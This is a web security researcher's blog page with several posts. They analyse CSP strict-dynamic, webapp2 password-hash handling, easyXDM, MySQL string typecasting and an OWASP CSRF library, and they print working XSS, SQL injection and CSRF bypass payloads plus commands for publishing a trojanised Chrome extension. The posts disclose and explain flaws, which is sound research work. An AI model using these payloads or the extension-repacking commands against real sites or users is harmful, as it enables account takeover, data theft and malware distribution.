Nothing Special

Tuesday, June 28, 2016

Reflections on trusting CSP

tl;dr: new changes in CSP sweep away a huge number of the vulns, yet they enable new bypasses. The Internet lives on, ignoring CSP.


Let’s talk about CSP today:
Content Security Policy (CSP) - a tool which developers can use to lock down their applications in various ways, mitigating the risk of content injection vulnerabilities such as cross-site scripting, and reducing the privilege with which their applications execute.

Assume XSS, mkay?

CSP is a defense-in-depth web feature that aims to mitigate XSS (for simplicity, let's ignore the other types of vulnerabilities CSP struggles with). Therefore, in this discussion, we can safely assume there is an XSS flaw in the application in the first place (otherwise, CSP is a no-op).

With this assumption, effective CSP is one that stops the XSS attacks while allowing execution of legitimate JS code. For any complex website, the legitimate code is either:
  • application-specific code, implementing its business logic, or
  • code of its dependencies (frameworks, libraries, 3rd party widgets)
Let’s see how CSP deals with both of them separately.
Just let me run my code!
When CSP was created, XSS was mostly caused by reflecting user input in the response (reflected XSS). The first attempt at solving this with CSP was to move every JS snippet from HTML to a separate resource and disable inline script execution (as inline scripts are the most likely XSS payloads reflected by a vulnerable application). In addition to providing security benefits, it also encouraged refactoring the applications (e.g. transitioning from spaghetti code to MVC paradigms or separating the behavior from the view; this was hip at that time).

Of course, this put a burden on application developers, as inline styles and scripts were prevalent back then - in the end, almost no one used CSP. And so the 'unsafe-inline' source expression was created. It allowed developers to use CSP without the security it provides (as the attacker could again inject code through reflected XSS).

Introducing insecurity into a security feature to ease adoption is an interesting approach, but at least it’s documented:
In either case, developers SHOULD NOT include either 'unsafe-inline', or data: as valid sources in their policies. Both enable XSS attacks by allowing code to be included directly in the document itself; they are best avoided completely.
That's why this new expression used the unsafe- prefix. If you're opting out of the security benefits, at least you're aware of it. Later on, this was made secure again when nonces were introduced. From then on, script-src 'unsafe-inline' 'nonce-12345' would only allow inline scripts if their nonce attribute had the given value.

Unless the attacker knew the nonce (or the reflection was in the body of a nonced script), their XSS payload would be stopped. Developers then had a way to use inline scripts in a safe fashion. 
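To illustrate (a minimal sketch - the nonce value here is made up, a real one must be unpredictable and regenerated for every response, and doSomethingLegit() is just a placeholder):

<meta http-equiv="Content-Security-Policy"
    content="script-src 'unsafe-inline' 'nonce-12345'">
<!-- executes: carries the expected nonce -->
<script nonce="12345">doSomethingLegit();</script>
<!-- blocked in nonce-aware browsers: no valid nonce -->
<script>alert(document.domain)</script>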
But what about my dependencies?
Most of the application dependencies were hosted on CDNs, and had to continue working after CSP was enabled in the application. CSP allowed developers to specify allowed URLs / paths and origins, from which the scripts could be loaded. Anything not on the whitelist would be stopped.

By using the whitelist in CSP you effectively declared that you trusted whatever scripts were on it. You might not have control over it (e.g. it's not served from your servers), but you trust it - and it had to be listed explicitly.

Obviously, there were a bunch of bypasses (remember, we assume the XSS flaw is present!) - for one, a lot of CDNs host libraries that execute JS from the page markup, rendering CSP useless as long as certain CDNs are whitelisted, as the sketch below shows. There were also various bypasses related to paths & redirections (the CSP Oddities presentation summarizes those in a great way).
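The classic illustration (a sketch under assumptions: the CDN hostname is made up, the host serving angular.js is on the whitelist, and the page runs an old AngularJS version whose expressions could reach Function):

<!-- attacker-injected markup: no inline script, so the CSP has nothing to block -->
<script src="https://whitelisted-cdn.example/angular.js"></script>
<div ng-app>
  {{ constructor.constructor('alert(document.domain)')() }}
</div>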

In short, it was a mess - also for maintenance. For example, this is a script-src from Gmail:
script-src https://clients4.google.com/insights/consumersurveys/ 'self' 'unsafe-inline' 'unsafe-eval' https://mail.google.com/_/scs/mail-static/ https://hangouts.google.com/ https://talkgadget.google.com/ https://*.talkgadget.google.com/ https://www.googleapis.com/appsmarket/v2/installedApps/ https://www-gm-opensocial.googleusercontent.com/gadgets/js/ https://docs.google.com/static/doclist/client/js/ https://www.google.com/tools/feedback/ https://s.ytimg.com/yts/jsbin/ https://www.youtube.com/iframe_api https://ssl.google-analytics.com/ https://apis.google.com/_/scs/abc-static/ https://apis.google.com/js/ https://clients1.google.com/complete/ https://apis.google.com/_/scs/apps-static/_/js/ https://ssl.gstatic.com/inputtools/js/ https://ssl.gstatic.com/cloudsearch/static/o/js/ https://www.gstatic.com/feedback/js/ https://www.gstatic.com/common_sharing/static/client/js/ https://www.gstatic.com/og/_/js/

Why so many sources? Well, if a certain script from, say, https://talkgadget.google.com/ loads a new script, it needs to be whitelisted too.

There are various quirks and bypasses with this type of CSP, but at least it's explicit. If a feature is unsafe, it's marked as such, together with the trust I put in all the other origins - and that trust is not transitive. Obviously, at the same time, it's very hard to adopt and maintain such a CSP for a given application, especially if your dependencies change their code.

The solution for that problem was recently proposed in the form of the strict-dynamic source expression.
Let's be strict!

What's strict-dynamic? Let's look at the CSP spec itself:
The "'strict-dynamic'" source expression aims to make Content Security Policy simpler to deploy for existing applications who have a high degree of confidence in the scripts they load directly, but low confidence in their ability to provide a reasonably secure whitelist. 
If present in a script-src or default-src directive, it has two main effects: 
1. host-source and scheme-source expressions, as well as the "'unsafe-inline'" and "'self'" keyword-sources will be ignored when loading script.
2. hash-source and nonce-source expressions will be honored. Script requests which are triggered by non-parser-inserted script elements are allowed.

The first change allows you to deploy "'strict-dynamic'" in a backwards compatible way, without requiring user-agent sniffing: the policy 'unsafe-inline' https: 'nonce-abcdefg' 'strict-dynamic' will act like 'unsafe-inline' https: in browsers that support CSP1, https: 'nonce-abcdefg' in browsers that support CSP2, and 'nonce-abcdefg' 'strict-dynamic' in browsers that support CSP3.
The second allows scripts which are given access to the page via nonces or hashes to bring in their dependencies without adding them explicitly to the page’s policy.
While it might not be obvious on first read, this introduces a transitive trust concept into CSP. strict-dynamic (in supporting browsers) turns off the whitelists completely. Now, whenever already-allowed code (e.g. because it carried a nonce) creates a new script element and injects it into the DOM, its execution will not be stopped, regardless of its properties (e.g. the src attribute value or the lack of a nonce). That script can in turn create additional scripts. It's like a tooth fairy handed out nonces to every new script element.
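For example (a sketch of the mechanics; the nonce value and URL are made up):

<script nonce="r4nd0m">
  // this script carries a valid nonce, so it executes...
  var s = document.createElement('script');
  // ...and under 'strict-dynamic' this non-parser-inserted script
  // element is allowed too - any src, no nonce needed
  s.src = 'https://third-party.example/whatever.js';
  document.head.appendChild(s);
</script>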


As a consequence, you're now not only trusting your direct dependencies, but also implicitly assuming that anything they load at runtime is fair game for your application too. By using it, you're effectively trading control for ease of maintenance.
POC||GTFO

The usefulness of CSP can be determined by its ability to stop an attack, assuming there is an XSS flaw in the application. By dropping the whitelists, strict-dynamic obviously increases the attack surface - even more so by introducing transitive trust.

On the other hand, it facilitates adopting a CSP policy that uses nonces. By enabling that, it mitigates a large chunk of reflected XSS flaws, as the injection point would have to be present inside a script element to execute (which is, I think, a rare occurrence). Unfortunately, DOM XSS flaws are much more common nowadays.

For DOM XSS flaws, a strict-dynamic CSP would be worse than a "legacy" CSP any time code could be tricked into creating an attacker-controlled script (as the old CSP would block it, but the new one would not). Unfortunately, such a flaw is likely present in a large number of applications. For example, here's an example exploit for applications using jQuery < 3.0.0, abusing this vuln.
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="Content-Security-Policy" content="script-src 'unsafe-inline' 
      'nonce-booboo' 'strict-dynamic'"> 
  <script nonce='booboo' src="https://code.jquery.com/jquery-2.2.4.js" ></script>
</head> 
<body>
<script nonce=booboo> 
// Patched in jQuery 3.0.0
// See https://github.com/jquery/jquery/issues/2432
// https://www.w3.org/TR/CSP3/#strict-dynamic-usage 
$(function() { 
   // URL control in $.get / $.post is a CSP bypass 
   // for CSP policies using strict-dynamic. 
   $.get('data:text/javascript,"use strict"%0d%0aalert(document.domain)');
});
</script>
</body>
</html>

Try it out (requires Chrome 52): https://plnkr.co/edit/x9d0ClcWOrl3tUd33oZR?p=preview

jQuery has a market share of over 96%, so it's not hard to imagine a large number of applications using $.get / $.post with controlled URLs. For those, strict-dynamic policies are trivially bypassable.
Summary

It was already demonstrated that we can't effectively understand and control what's available in the CDNs we trust in our CSPs (so we can't even maintain the whitelists we trust). How come losing control and making the trust transitive is a solution here?

At the very least, these tradeoffs should be expressed by using an unsafe- prefix. In fact, the expression used to be called unsafe-dynamic, but that was dropped recently. So now we have a strict-* expression that likely enables bypasses that were not present with oldschool CSP. All that to ease the adoption of a security mitigation. Sigh :/

Thursday, July 31, 2014

JS crypto goto fail?

tldr; A long, passionate discussion about JS crypto. Use slides for an overview.

Javascript cryptography is on the rise. What used to be a rich source of vulnerabilities and regarded as "not a serious research area" is suddenly used by many. Over the last few years, there was a serious effort to develop libraries implementing cryptographic primitives and protocols in JS. So now we have at least:
On top of that, there's a lot of fresh, new user-facing applications (Whiteout.IO, Keybase.io, miniLock to name just the fancy ones on .io domains). JS crypto is used in websites, browser extensions, and server-side applications - whether we like it or not. It is time to look again at the challenges and limits of crunching secret numbers in Javascript.

Saturday, March 22, 2014

When you don't have 0days. Client-side exploitation for the masses

Yesterday @antisnatchor and I gave a talk at Insomni'hack entitled "When you don't have 0days. Client-side exploitation for the masses". We described different tricks that one can use during a pentesting assignment to achieve goals without burning any of those precious 0days.

The tricks included the new Chrome extension exploitation tools ported recently to BeEF (by yours truly and @antisnatchor), HTA (HTML applications), Office macros, abusing UI expectations in IE, and some tricks with Java applets running on older Java. Mosquito was also demonstrated. Without further ado, here are the slides:


When you don't have 0days: client-side exploitation for the masses from Michele Orru

All the video links for the demos are on the slides, the code is public and landed in BeEF in tools/ subdirectory. The gist of the Chrome extensions part: you can now clone an arbitrary Chrome extension, add any code to it, and publish it back as your extension by doing:

$ cd beef/tools/chrome_extension_exploitation/
$ injector/repacker-webstore.sh <original-ext-id> zip repacked.zip evil.js "evil-permissions"
$ ruby webstore_uploader/webstore_upload.rb repacked.zip publish

Enjoy!

Monday, January 13, 2014

XSSing with Shakespeare: Name-calling easyXDM

tl;dr: window.name, DOM XSS & abusing Objects used as containers

What's in a name?

"What's in a name? That which we call a rose
By any other name would smell as sweet"
(Romeo & Juliet, Act II, Scene 2)

While Juliet probably was a pretty smart girl, this time she got it wrong. There is something special in a name. At least in window.name. For example, it can ignore Same Origin Policy restrictions. Documents from https://example.com and https://foo.bar are isolated from each other, but they can "speak" through window.name.

Since name is special for Same Origin Policy, it must have some evil usage, right? Right - the cutest one is that eval(name) is the shortest XSS payload loader so far:
  • create a window/frame
  • put the payload in its name
  • just load http://vuln/?xss="><script>eval(name)</script> (a minimal sketch follows below).
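A sketch of the loader (the vulnerable URL is of course hypothetical); the second argument of window.open() becomes the new window's name:

<script>
  // the payload travels in window.name; the reflected
  // "><script>eval(name)</script> executes it in the vulnerable origin
  window.open('http://vuln/?xss="><script>eval(name)<\/script>',
      'alert(document.domain)');
</script>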
But that's old news (I think it was Gareth's trick, correct me if I'm wrong). This time I'll focus on exploiting software that uses window.name for legitimate purposes. A fun practical challenge (found by accident, srsly)!

Friday, December 27, 2013

Rapportive XSSes Gmail or have yourself a merry little botnet...

tldr: Learn how to code-audit Handlebars applications. XSS in an extension = fun times. Mosquito gets new features.

It's that magical time of the year, when wonders happen... Everyone's getting big presents. I was apparently naughty, cause I only got one XSS. What can one do? If life gives you lemons...


you make a lemonade. And I don't mean Google juice - it does not qualify.

But XSS on Gmail?!

You see, the code executing on the mail.google.com domain is not always the code belonging to Google and subject to their bug bounty. Unfortunately, there's much, much more code coming from other domains too, and it does not come close to Google quality. I'm of course talking about browser extensions. I've been researching this subject for two years now, with quite a few results, and if I had to sum it all up in one sentence it would be:

Browser extensions are badly coded, can affect your website with their vulnerabilities and there's nothing you can do about it.

And this is exactly the case here: we have a top-notch Gmail application and a very popular extension that reduces Gmail to a lousy PHPBB-like forum full of XSSes. But this time, I decided to push the matter forward and demonstrate what's possible when one can execute JS in the Gmail origin. But first, let me introduce you to today's hero, Rapportive.

Monday, December 16, 2013

Breaking Google AppEngine webapp2 applications with a single hash

What's this, you think?

07667c4d55d8d81a0f0ac47b2edba75cb948d3a2$sha1$1FsWaTxdaa5i

It's easy to tell that this is a salted password hash, using sha1 as the hashing algorithm. What do you do with it? You crack it, obviously!

No wonder that when talking about password hash security, we usually only consider salt length, using salt & pepper, or the speed of the algorithm. We speculate about their resistance to offline bruteforcing. In other words, we're trying to answer the question "how f^*$d are we when the attacker gets to read our hashes". Granted, these issues are extremely important, but there are others.

A weird assumption

Today, we'll speculate what can be done when the attacker gets to supply you with a password hash like above.

Who would ever allow the user to submit a password hash, you ask? Well, for example WordPress did, and had a DoS because of that. It's just bound to happen from time to time (and it's not the point of this blog post anyway). Let's just assume this is the case - for example, someone wrote a malicious hash into your DB.

Introducing the culprit

We need to have some code to work on. Let's jump on the cloud bandwagon and take a look at Google AppEngine. For Python applications, Google suggests webapp2. Fine with me, let's do it!

When authenticating users in webapp2, you can just make them use Google Accounts and rely on OAuth, but you can also manage your users' accounts & passwords on your own. Of course, passwords are then salted and hashed - you can see an example hash at the beginning of this post. For hashing, the webapp2 security module uses a standard Python module, hashlib.

Authenticating in webapp2

When does a webapp2 application process a hash? Usually when authenticating. For example, if user ba_baracus submits the password ipitythefool, the application:
  1. Finds the record for user ba_baracus
  2. Extracts his password hash: 07667c4d55d8d81a0f0ac47b2edba75cb948d3a2$sha1$1FsWaTxdaa5i
  3. Parses it, extracting the random salt (1FsWaTxdaa5i) and algorithm (sha1)
  4. Calculates sha1 hash of ipitythefool, combined with the salt (e.g. uses hmac with salt as a key)
  5. Compares the result with 07667c4d55d8d81a0f0ac47b2edba75cb948d3a2. Sorry, Mr T, password incorrect this time!

Steps 1 and 2 happen in User.get_by_auth_password(), steps 3 to 5 in webapp2_extras.security.check_password_hash():
def check_password_hash(password, pwhash, pepper=None):
    """Checks a password against a given salted and hashed password value.

    In order to support unsalted legacy passwords this method supports
    plain text passwords, md5 and sha1 hashes (both salted and unsalted).

    :param password:
        The plaintext password to compare against the hash.
    :param pwhash:
        A hashed string like returned by :func:`generate_password_hash`.
    :param pepper:
        A secret constant stored in the application code.
    :returns:
        `True` if the password matched, `False` otherwise.

    This function was ported and adapted from `Werkzeug`_.
    """
    if pwhash.count('$') < 2:
        return False

    hashval, method, salt = pwhash.split('$', 2)
    return hash_password(password, method, salt, pepper) == hashval


def hash_password(password, method, salt=None, pepper=None):
    """Hashes a password.

    Supports plaintext without salt, unsalted and salted passwords. In case
    salted passwords are used hmac is used.

    :param password:
        The password to be hashed.
    :param method:
        A method from ``hashlib``, e.g., `sha1` or `md5`, or `plain`.
    :param salt:
        A random salt string.
    :param pepper:
        A secret constant stored in the application code.
    :returns:
        A hashed password.

    This function was ported and adapted from `Werkzeug`_.
    """
    password = webapp2._to_utf8(password)
    if method == 'plain':
        return password

    method = getattr(hashlib, method, None)
    if not method:
        return None

    if salt:
        h = hmac.new(webapp2._to_utf8(salt), password, method)
    else:
        h = method(password)

    if pepper:
        h = hmac.new(webapp2._to_utf8(pepper), h.hexdigest(), method)

    return h.hexdigest()
So, during authentication, we control pwhash (it's our planted hash), and password. What harm can we do? First, a little hashlib 101:

Back to school

How does one use hashlib? First, you create an object with a specified algorithm:
new(name, string='') - returns a new hash object implementing the
                       given hash function; initializing the hash
                       using the given string data.

Named constructor functions are also available, these are much faster
than using new():

md5(), sha1(), sha224(), sha256(), sha384(), and sha512()
Then you just fill it with the string to hash, using the update() method (you can also pass the string directly to the constructor), and later use e.g. hexdigest() to extract the hash. Very simple:
>>> import hashlib
>>> hashlib.md5('a string').hexdigest()
'3a315533c0f34762e0c45e3d4e9d525c'
>>> hashlib.new('md5','a string').hexdigest()
'3a315533c0f34762e0c45e3d4e9d525c'

Webapp2 uses getattr(hashlib, method)(password).hexdigest(), and we control both method and password.

Granted, the construct does its job. Installed algorithms work, a NoneType error is thrown for unsupported algorithms, and the hash is correct:
>>> getattr(hashlib, 'md5', None)('hash_me').hexdigest()
'77963b7a931377ad4ab5ad6a9cd718aa'
>>> getattr(hashlib, 'sha1', None)('hash_me').hexdigest()
'9c969ddf454079e3d439973bbab63ea6233e4087'
>>> getattr(hashlib, 'nonexisting', None)('hash_me').hexdigest()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: 'NoneType' object is not callable

It's a kind of magic!

There is a slight problem with this approach though - magic methods. Even a simple dir() call gives us a hint that there are quite a few additional, magic attributes:
>>> dir(hashlib)
['__all__', '__builtins__', '__doc__', '__file__', '__get_builtin_constructor', '__name__', '__package__', '_hashlib', 'algorithms', 'md5', 'new', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512']
which means, for example, that if arbitrary strings can be passed as the 2nd argument to getattr(), much more than a NoneType error can happen:
>>> getattr(hashlib, '__name__')()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: 'str' object is not callable
>>> getattr(hashlib, '__class__')
<type 'module'>
>>> getattr(hashlib, '__class__')('hash_me')
<module 'hash_me' (built-in)>
>>> getattr(hashlib, 'new')('md5').hexdigest()
'd41d8cd98f00b204e9800998ecf8427e' # this is actually md5 of ''
That last bit is kewl - you can plant a hash of the format md5_of_empty_string$new$ and the correct password is... md5!

Final act

__class__ may have a class, but __delattr__ is the real gangster!
>>> import hashlib
>>> hashlib.sha1
<built-in function openssl_sha1>
>>> getattr(hashlib, '__delattr__')('sha1').hexdigest()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'NoneType' object has no attribute 'hexdigest'
>>> hashlib.sha1
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: 'module' object has no attribute 'sha1'

Ladies and gentlemen, we just broke a Google AppEngine webapp2 application with a single hash! We just deleted the whole hashlib.sha1 function, and all subsequent hash comparisons will be invalid! In other words, no user with a sha1 hash in this application instance will be able to authenticate. Plus, we broke session cookies as well, as they use hashlib.sha1 for their signature (but that's another story). As this is not a PHP serve-one-request-and-die model, but a full-blown web application, the corrupted hashlib will live until the application is shut down and restarted (methinks; at least that's the behavior I observed). After that, you can still retrigger the vuln by authenticating again!

Demo

Disclaimer: This is tracked with issue #87. Only applications that somehow allow the user to write a hash are vulnerable (and this setup is probably exotic). But the getattr(hashlib, something-from-user) construct is very popular, so feel free to find a similar vulnerability elsewhere:


Tuesday, October 15, 2013

Exploiting EasyXDM part 2: & considered harmful


tldr: URL parsing is hard, always encode stuff and Safari has some interesting properties...

This is a second post describing easyXDM vulnerabilities. Reading the first part might come in handy:

Intro

"EasyXDM is a Javascript library that enables you as a developer to easily work around the limitation set in place by the Same Origin Policy, in turn making it easy to communicate and expose javascript API’s across domain boundaries". Vulnerabilities were found in 2.4.16 version, and are patched in 2.4.18. They are tracked with a single CVE-2013-5212.

In the first post I've described an XSS vulnerability in the Flash transport used by that library; however, the exploit conditions were very limiting. On websites using easyXDM, the following code (used e.g. to set up RPC endpoints):
<script type="text/javascript" src="easyXDM.debug.js">
</script>
<script type="text/javascript">
    var transport = new easyXDM.Socket({
        local: ".",
        swf: "easyxdm.swf",
    });
</script>
can cause XSS when it's loaded by a URL like: http://example.com?#xdm_e=https%3A%2F%2Flossssscalhost&xdm_c=default7059&xdm_p=6&xdm_s=j%5C%22-alerssst(2)))%7Dcatch(e)%7Balert(document.domain)%7D%2F%2Feheheh. That will force easyXDM to use the vulnerable Flash transport and pass along the injected XSS payload. However, the payload will only be used if the Flash file is set up with the FlashVars parameter log=true.

Mom, where do flashvars come from?

Let's dig deeper. How is the HTML for the SWF inclusion constructed? Looking at the source code on GitHub (FlashTransport.js):
function addSwf(domain){
...
  // create the object/embed
  var flashVars = "callback=flash_loaded" + domain.replace(/[\-.]/g, "_") + "&proto=" + 
      global.location.protocol + "&domain=" + getDomainName(global.location.href) + "&port=" +   
      getPort(global.location.href) + "&ns=" + namespace;
  // #ifdef debug
  flashVars += "&log=true";
  // #endif
  ..
  swfContainer.innerHTML = ... + "<param name='flashvars' value='" +
  flashVars +
  "'></param>" ....
This 'debug' flag is a preprocessor instruction. The #ifdef / #endif block of code will only be included in the easyXDM.debug.js file:
<!-- Process pre proccesing instructions like #if/#endif etc -->
<preprocess infile="work/easyXDM.combined.js" outfile="work/easyXDM.js"/>
<preprocess infile="work/easyXDM.combined.js" outfile="work/easyXDM.debug.js" defines="debug"/>
Exploiting the easyXDM.debug.js file described in the first post was straightforward. But if the production version of the easyXDM library is used instead, there is no log parameter and the XSS won't work. What can we do? As always - look at the code, because code=vulns.

Thou shalt not parse URLs thyself!

In the FlashVars construction code, the getPort and getDomainName functions are used to extract the domain and port parameters from the current window location (global.location). Let's see what happens with the domain name (Core.js):
function getDomainName(url){
    // #ifdef debug
    if (!url) {
        throw new Error("url is undefined or empty");
    }
    // #endif
    return url.match(reURI)[3];
}
It is being matched against the following regular expression:
var reURI = /^((http.?:)\/\/([^:\/\s]+)(:\d+)*)/; // returns groups for protocol (2), domain (3) and port (4)
In simpler terms - everything after httpX:// and before :digits or a / becomes a domain name. Seems solid, right? WRONG.
Among the many tricks for bypassing URL parsers (see e.g. kotowicz.net/absolute), HTTP authentication credentials are rarely used. But this time they fit perfectly. You see, the hostname (domain name) is not the only thing that can come right after the protocol. Not to bore you with RFCs, this is also a valid URL:

http://user:password@host/

If our document was loaded from a URL containing user credentials, getDomainName() would return user:password@host (sometimes; there are browser differences here). FlashVars, in that case, would be:
callback=flash_loaded_something&proto=http:&domain=user:password@host&port=&ns=something
Still, nothing interesting, but...

Honor thy Encoding and thy Context

(c) Wumo - http://kindofnormal.com/wumo/2013/10/12
In the previous example we injected some characters into the FlashVars string, but none of them were dangerous in that context. But as you can see:
  var flashVars = "callback=flash_loaded" + domain.replace(/[\-.]/g, "_") + "&proto=" + global.location.protocol + "&domain=" + getDomainName(global.location.href) + "&port=" + getPort(global.location.href) + "&ns=" + namespace;
The values of the various parameters are not percent-encoded (i.e. encodeURIComponent is not used). If only we could use & and = characters in the username part, we could inject additional FlashVars. For example, loading this URL:

http://example.com&log=true&a=@example.com?#xdm_e=https%3A%2F%2Flossssscalhost&xdm_c=default7059&xdm_p=6&xdm_s=j%5C%22-alerssst(2)))%7Dcatch(e)%7Balert(document.domain)%7D%2F%2Feheheh

(the part before the @ - example.com&log=true&a= - is actually the username, not a domain name) would cause:
...proto=http:&domain=example.com&log=true&a=@example.com&port=...
injecting our log=true parameter and triggering the exploit. But can we?

Effin phishers!

Kinda. Credentials in URLs were used extensively in phishing attacks, so most current browsers don't really like them. While usually you can use = and & characters in credentials, there are serious obstacles, e.g.:
  • Firefox won't return credentials at all in location.href
  • Chrome will percent encode crucial characters, including = and &
However, Safari 6 does not see a problem with loading a URL like this: http://h=&ello@localhost/ and returning the same thing in location.href. So - easyXDM 2.4.16 is XSS-exploitable in Safari 6 and possibly in some other obscure or ancient browsers. In Safari, due to effing phishers, using credentials in the URL will trigger a phishing warning, so the user must confirm the navigation. Well, Sad Panda^2. But still - it's an easyXDM universal XSS on a popular browser with limited user interaction.

Developers

  • Always use context aware encoding!
  • Don't parse URLs manually!

Monday, September 23, 2013

Exploiting EasyXDM part 1: Not the usual Flash XSS

tldr: You're using easyXDM? Upgrade NOW. Otherwise - read up on exploiting difficult Flash vulnerabilities in practice.

Secure cross-domain communication is hard enough, but it's a piece of cake compared to making it work in legacy browsers. One popular library that tries to handle all the quirks and even builds an RPC framework is easyXDM.

But this is not an advertisement. As usual, you only get to hear about easyXDM here, because I found some interesting vulnerabilities. Combined, those allow me to XSS websites using that library. Certain conditions apply. As exploiting the subject matter is quite complex, I decided to split the post into two parts, this being the first one.

Thursday, July 11, 2013

Jealous of PRISM? Use "Amazon 1 Button" Chrome extension to sniff all HTTPS websites!

tldr: Insecure browser addons may leak all your encrypted SSL traffic, exploits included

So, Snowden let the cat out of the bag. They're listening - the news is so big that feds are no longer welcome at DEFCON. But let's all be honest - who doesn't like to snoop into other people's secrets? We all know how to set up a rogue AP and use ettercap. Setting up your own wall of sheep is trivial. I think we can safely assume: plaintext traffic is dead easy to sniff and modify.

The real deal though is in the encrypted traffic. In browser's world that means all the juicy stuff is sent over HTTPS. Though intercepting HTTPS connections is possible, we can only do it via:
  • hacking the CA
  • social engineering (install the certificate) 
  • relying on click-through syndrome for SSL warnings
Too hard. Let's try some side channels. Let me show you how you can view all SSL-encrypted data by exploiting the Amazon 1Button App installed in your victims' browsers.

Friday, January 11, 2013

Abusing MySQL string arithmetic for tiny SQL injections

Today I've found a small nifty trick that may become helpful when exploiting SQL injection vulnerabilities for MySQL. Namely, you can abuse MySQL string typecasting.

But first, let's look at this:

MySQL, what are you doing?

mysql> desc t;
+-------+-------------+------+-----+---------+-------+
| Field | Type        | Null | Key | Default | Extra |
+-------+-------------+------+-----+---------+-------+
| name  | varchar(20) | YES  |     | NULL    |       |
| num   | int(11)     | YES  |     | NULL    |       |
+-------+-------------+------+-----+---------+-------+
2 rows in set (0.11 sec)
mysql> select * from t;
+--------+------+
| name   | num  |
+--------+------+
| nazwa  |    3 |
| second |    4 |
+--------+------+
2 rows in set (0.00 sec)
mysql> select * from t where name='';
Empty set (0.00 sec)
mysql> select * from t where name=''-'';
+--------+------+
| name   | num  |
+--------+------+
| nazwa  |    3 |
| second |    4 |
+--------+------+
2 rows in set, 2 warnings (0.00 sec)
WTF just happened? Warnings clear up the situation a little bit:
mysql> show warnings;
+---------+------+--------------------------------------------+
| Level   | Code | Message                                    |
+---------+------+--------------------------------------------+
| Warning | 1292 | Truncated incorrect DOUBLE value: 'nazwa'  |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'second' |
+---------+------+--------------------------------------------+
2 rows in set (0.00 sec)
The minus operator used on strings converted them to DOUBLE, a numeric value. What's the result of this statement?
mysql> select ''-'';
+-------+
| ''-'' |
+-------+
|     0 |
+-------+
So for each row, the 'name' column was compared to 0. That triggered another type conversion and, with a warning, the effective value for each row was 0, which satisfied the WHERE condition (0 = ''-'').

The SQL injection part

How can the attacker abuse this quirk? Imagine that you:
  • have a limited character set (e.g. no whitespace, no equals sign, no parenthesis, no letters) or small length available,
  • vulnerable query SELECT secret FROM table WHERE secret='$injection' AND another>5 AND ... that needs to return at least one row,
  • and you don't know the values for the secret column (they're not easily enumerable),
A simple payload '-''# will turn that query into:
SELECT secret FROM table WHERE secret=''-''# AND .....
and will return all rows (apart from those that match /^-?[0-9]/).

You can use the same trick with ''+'', ''&'', ''^'' and ''*''. Beware though:
mysql> select 1 from dual where 'something' = ''/'';
Empty set, 1 warning (0.00 sec)

mysql> select 1 from dual where 'something' = ''/1;
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set, 1 warning (0.00 sec)
Another trick would be to simply compare a string column to ''-0:
mysql> select * from t where name=''-0;
+--------+------+
| name   | num  |
+--------+------+
| nazwa  |    3 |
| second |    4 |
+--------+------+
2 rows in set, 2 warnings (0.00 sec)

The tricks mentioned here were tested on MySQL 5.5 and 5.1, but should work in older versions too.

And that's all folks. For all your SQL injection techniques, I highly recommend The SQL injection reference by Roberto Salgado. It helped me numerous times and is in my opinion the best reference on SQLi ever made.

Friday, December 7, 2012

On handling your pets and a CSRF protection that wasn't

Security is hard. While security-related issues are a fun and challenging subject for many - fun enough for them to take part in various CTFs, crackmes etc. - it's usually not the first thing a developer cares about. Yes, they do have other priorities. That's why leaving a developer with the task of writing security-related code usually results in either:

Look what I found, ma!

Using libraries though is like bringing a pet home. Sure, it's cute and all, but you should be responsible for it from now on. That means you should:
  1. Care for it day after day (= keep libraries up to date).
  2. Observe it. If it's sick, go to a vet (= monitor for security vulnerabilities discovered).
  3. Accept that it's a part of the family now (= treat it with as much scrutiny as your own code).
Whatever you're bringing into your codebase, wherever it came from - it's your responsibility now. No matter if it's a snippet found on a forum, a github.com-hosted library used by a few dozen people, or a project used for many years and extensively tested. It may have a security vulnerability, it may be used insecurely, it may not be the right tool for the task. Be skeptical.

The code almighty

There are no sacred cows. Any code is just that - a set of instructions made by humans, with a certain probability of containing errors, some of them security-related. And every human makes mistakes, some of them catastrophic.

Let me give you an example - OWASP PHP CSRF Guard, a small library for enriching your PHP application with CSRF protection, similar to what OWASP CSRFGuard does for Java applications. This small library is presented on the Open Web Application Security Project wiki, so it must be secure... Right?

No. No sacred cows, remember? Take a look:
if (!isset($_POST['CSRFName']))
{
 trigger_error("No CSRFName found, probable invalid request.",E_USER_ERROR);  
} 
$name =$_POST['CSRFName'];
$token=$_POST['CSRFToken'];
if (!csrfguard_validate_token($name, $token))
{ 
 trigger_error("Invalid CSRF token.",E_USER_ERROR);
}
The application uses separate tokens for every form. Upon form submission, it gets the form id (CSRFName) and the appropriate token (CSRFToken) from the POST request and calls csrfguard_validate_token(). So far so good. Let's dig deeper though.
function csrfguard_validate_token($unique_form_name,$token_value)
{
 $token=get_from_session($unique_form_name);
 if ($token===false)
 {
  return true;
 }
 elseif ($token==$token_value)
 {
  $result=true;
 }
 else
 { 
  $result=false;
 } 
 unset_session($unique_form_name);
 return $result;
}
The function retrieves the token for a form id from the session (get_from_session). The function returning false is an exceptional case; let's skip that. Then the token value from POST is compared to its session equivalent. Looks ok. But..
function get_from_session($key)
{
 if (isset($_SESSION))
 {
  return $_SESSION[$key];
 }
 else {  return false; } //no session data, no CSRF risk
}
What happens if there is no such $key in $_SESSION? null will be returned. So, retrieving a token for non-existent form id will return null.

Guess what? In PHP, null == "". So, submitting this:
CSRFName=CSRFGuard_idontexist&CSRFToken=&input1=value1&input2=value2....
in your POST request will call:
csrfguard_validate_token('CSRFGuard_idontexist', '') // and then
$token = get_from_session('CSRFGuard_idontexist') = null; // => 
$token_value = ''; // => 
$token_value == $token; // =>
return true;
Total CSRF protection bypass. No sacred cows. Of course, the code in the OWASP wiki has since been fixed.

Developers, remember: do not blindly include libraries, even OWASP ones, without testing them, especially for security errors. If you can't do it - there are other people who can ( ^-^ ). After all, once it's adopted, it's part of the family.

Friday, November 9, 2012

Keys to a kingdom - can you crack a JS crypto?

I've posted a small, quick challenge for all of you to try. It's got it all - HTML5, crypto, client-side Javascript, fast action, neat dialogues and a beautiful princess.

